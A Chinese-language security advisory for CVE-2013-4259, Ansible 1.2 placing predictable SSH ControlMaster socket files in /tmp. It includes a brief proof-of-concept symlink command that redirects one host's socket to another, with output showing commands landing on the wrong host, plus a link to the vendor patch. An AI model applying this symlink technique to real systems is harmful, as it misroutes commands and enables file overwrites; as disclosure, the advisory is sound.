ansible不安全临时文件创建漏洞(CVE-2013-4259)

ansible不安全临时文件创建漏洞(CVE-2013-4259)

发布日期：2013-09-03
更新日期：2013-09-05

受影响系统：
ansible ansible 1.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62137
CVE(CAN) ID: CVE-2013-4259

ansible是简单的配置管理、部署、任务执行、多节点编制框架。

ansible 1.2会在/tmp的可预测位置创建ControlMaster文件，可造成ssh套接字注入，导致符号链接攻击，覆盖受影响应用上下文中的任意文件。

<*来源：Michael Scherer （mscherer@redhat com）
 
  链接：https://bugzilla.redhat.com/show_bug.cgi?id=998223
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

~ $ sudo ln -s /tmp/ansible-ssh-elspeth.example.org-22-misc /tmp/ansible-ssh-sisay.example.org-22-misc

~ $ ansible -i 'elspeth.example.org,sisay.example.org' all -m shell -u misc -a hostname
elspeth.example.org | success | rc=0 >>
elspeth.example.org

sisay.example.org | success | rc=0 >>
elspeth.example.org

建议：
--------------------------------------------------------------------------------
厂商补丁：

ansible
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://github.com/ansible/ansible

https://github.com/ansible/ansible/commit/6bf5d195065bc23b5fc72ba690d7ed45f228aaf0